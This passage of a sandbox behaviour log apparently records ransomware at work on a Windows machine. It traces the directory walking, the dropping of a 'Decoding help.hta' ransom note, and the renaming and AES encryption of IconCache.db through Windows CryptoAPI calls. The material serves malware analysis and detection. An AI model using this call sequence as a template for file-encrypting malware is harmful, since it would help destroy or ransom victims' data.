ftLastWriteTime.dwLowDateTime=0x1fc50000, ftLastWriteTime.dwHighDateTime=0x1ca2c5f, nFileSizeHigh=0x0, nFileSizeLow=0x82b958, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmgdsrv.dll", cAlternateFileName="")) returned 1 Thread: id = 320 os_tid = 0x510 [0042.519] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*", lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716f0 [0042.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.522] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.522] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.522] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0042.522] lstrcmpW (lpString1=".", lpString2="1033") returned -1 [0042.522] lstrcmpW (lpString1="..", lpString2="1033") returned -1 [0042.522] lstrcmpiW (lpString1="windows", lpString2="1033") returned 1 [0042.711] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*" [0042.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*") returned 68 [0042.711] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\", lpString2="1033" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033" [0042.711] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*" [0042.711] GlobalMemoryStatus (in: lpBuffer=0x5bcfd10 | out: lpBuffer=0x5bcfd10) [0042.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d3eae8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x658 [0042.717] CloseHandle (hObject=0x658) returned 1 [0042.717] FindNextFileW (in: hFindFile=0x6716f0, lpFindFileData=0x5bcfd30 | out: lpFindFileData=0x5bcfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0042.717] FindClose (in: hFindFile=0x6716f0 | out: hFindFile=0x6716f0) returned 1 Thread: id = 321 os_tid = 0x514 [0042.521] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*", lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6716b0 [0042.522] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.522] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.522] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.522] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.522] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 1 [0042.522] lstrcmpW (lpString1=".", lpString2="x64") returned -1 [0042.522] lstrcmpW (lpString1="..", lpString2="x64") returned -1 [0042.522] lstrcmpiW (lpString1="windows", lpString2="x64") returned -1 [0042.702] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*" [0042.702] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\*.*") returned 62 [0042.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\", lpString2="x64" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64" [0042.702] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*" [0042.702] GlobalMemoryStatus (in: lpBuffer=0xd30fd10 | out: lpBuffer=0xd30fd10) [0042.702] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x115d9668, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0042.703] CloseHandle (hObject=0x668) returned 1 [0042.703] FindNextFileW (in: hFindFile=0x6716b0, lpFindFileData=0xd30fd30 | out: lpFindFileData=0xd30fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="x64", cAlternateFileName="")) returned 0 [0042.703] FindClose (in: hFindFile=0x6716b0 | out: hFindFile=0x6716b0) returned 1 Thread: id = 322 os_tid = 0x574 [0042.523] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*", lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66fe9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x93e4774a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671770 [0042.524] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.524] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66fe9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x93e4774a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.524] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.524] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.524] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0042.524] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0042.524] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0042.524] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0042.720] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0042.720] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0042.720] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data" [0042.720] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Application Data\\*.*" [0042.720] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0042.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x96d2090, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x68c [0042.733] CloseHandle (hObject=0x68c) returned 1 [0042.733] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0042.733] lstrcmpW (lpString1=".", lpString2="History") returned -1 [0042.733] lstrcmpW (lpString1="..", lpString2="History") returned -1 [0042.733] lstrcmpiW (lpString1="windows", lpString2="History") returned 1 [0042.733] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0042.733] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0042.733] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="History" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History" [0042.733] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\History\\*.*" [0042.733] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0042.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x971a1c8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x68c [0042.741] CloseHandle (hObject=0x68c) returned 1 [0042.741] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x66b2700, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x66b2700, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xddd35f67, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0xbd7f0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 1 [0042.741] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0042.741] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0042.741] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Decoding help.hta" [0042.741] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\local\\decoding help.hta")) returned 0xffffffff [0042.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Decoding help.hta" (normalized: "c:\\users\\default\\appdata\\local\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x68c [0042.742] WriteFile (in: hFile=0x68c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x610fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x610fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.743] CloseHandle (hObject=0x68c) returned 1 [0042.743] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.743] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IconCache.db") returned -1 [0042.743] lstrlenW (lpString="IconCache.db") returned 12 [0042.743] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0042.743] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0042.743] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" [0042.743] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" [0042.743] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" [0042.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f4 [0042.751] CreateFileMappingA (hFile=0x6f4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6f8 [0042.751] CryptAcquireContextA (in: phProv=0x610fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x610fcec*=0x34493e0) returned 1 [0047.015] CryptGenKey (in: hProv=0x34493e0, Algid=0x6610, dwFlags=0x1, phKey=0x610fce8 | out: phKey=0x610fce8*=0x6717f0) returned 1 [0047.015] CryptExportKey (in: hKey=0x6717f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x610fbe4, pdwDataLen=0x610fce4 | out: pbData=0x610fbe4*, pdwDataLen=0x610fce4*=0x2c) returned 1 [0047.015] MapViewOfFile (hFileMappingObject=0x6f8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd7e0) returned 0x6210000 [0047.036] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x610fbe4*, pdwDataLen=0x610fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x610fbe4*, pdwDataLen=0x610fcf8*=0x100) returned 1 [0047.036] CryptEncrypt (in: hKey=0x6717f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6210000, pdwDataLen=0x610fce4*=0xbd7e0, dwBufLen=0xbd7e0 | out: pbData=0x6210000*, pdwDataLen=0x610fce4*=0xbd7e0) returned 1 [0047.468] UnmapViewOfFile (lpBaseAddress=0x6210000) returned 1 [0049.200] CloseHandle (hObject=0x6f8) returned 1 [0049.200] CryptDestroyKey (hKey=0x6717f0) returned 1 [0049.200] CryptReleaseContext (hProv=0x34493e0, dwFlags=0x0) returned 1 [0049.200] SetFilePointerEx (in: hFile=0x6f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.200] WriteFile (in: hFile=0x6f4, lpBuffer=0x610fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x610fcf8, lpOverlapped=0x0 | out: lpBuffer=0x610fbe4*, lpNumberOfBytesWritten=0x610fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.053] WriteFile (in: hFile=0x6f4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x610fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x610fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.053] CloseHandle (hObject=0x6f4) returned 1 [0052.612] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0056.918] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x184eadb, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0056.918] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0056.918] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0056.918] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0056.918] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0056.918] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0056.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft" [0056.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*" [0056.918] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0056.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4118180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x610 [0056.919] CloseHandle (hObject=0x610) returned 1 [0056.919] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3b34dcb8, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0056.919] lstrcmpW (lpString1=".", lpString2="Temp") returned -1 [0056.919] lstrcmpW (lpString1="..", lpString2="Temp") returned -1 [0056.919] lstrcmpiW (lpString1="windows", lpString2="Temp") returned 1 [0056.919] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0056.920] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0056.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="Temp" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp" [0056.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*.*" [0056.920] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0056.920] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x34283f0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x610 [0056.920] CloseHandle (hObject=0x610) returned 1 [0056.921] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 | out: lpFindFileData=0x610fd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0056.921] lstrcmpW (lpString1=".", lpString2="Temporary Internet Files") returned -1 [0056.921] lstrcmpW (lpString1="..", lpString2="Temporary Internet Files") returned -1 [0056.921] lstrcmpiW (lpString1="windows", lpString2="Temporary Internet Files") returned 1 [0056.921] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*" [0056.921] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\*.*") returned 38 [0056.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\", lpString2="Temporary Internet Files" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files" [0056.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*.*" [0056.921] GlobalMemoryStatus (in: lpBuffer=0x610fd10 | out: lpBuffer=0x610fd10) [0056.921] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x245d9130, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x610 [0056.922] CloseHandle (hObject=0x610) returned 1 [0056.922] FindNextFileW (in: hFindFile=0x671770, lpFindFileData=0x610fd30 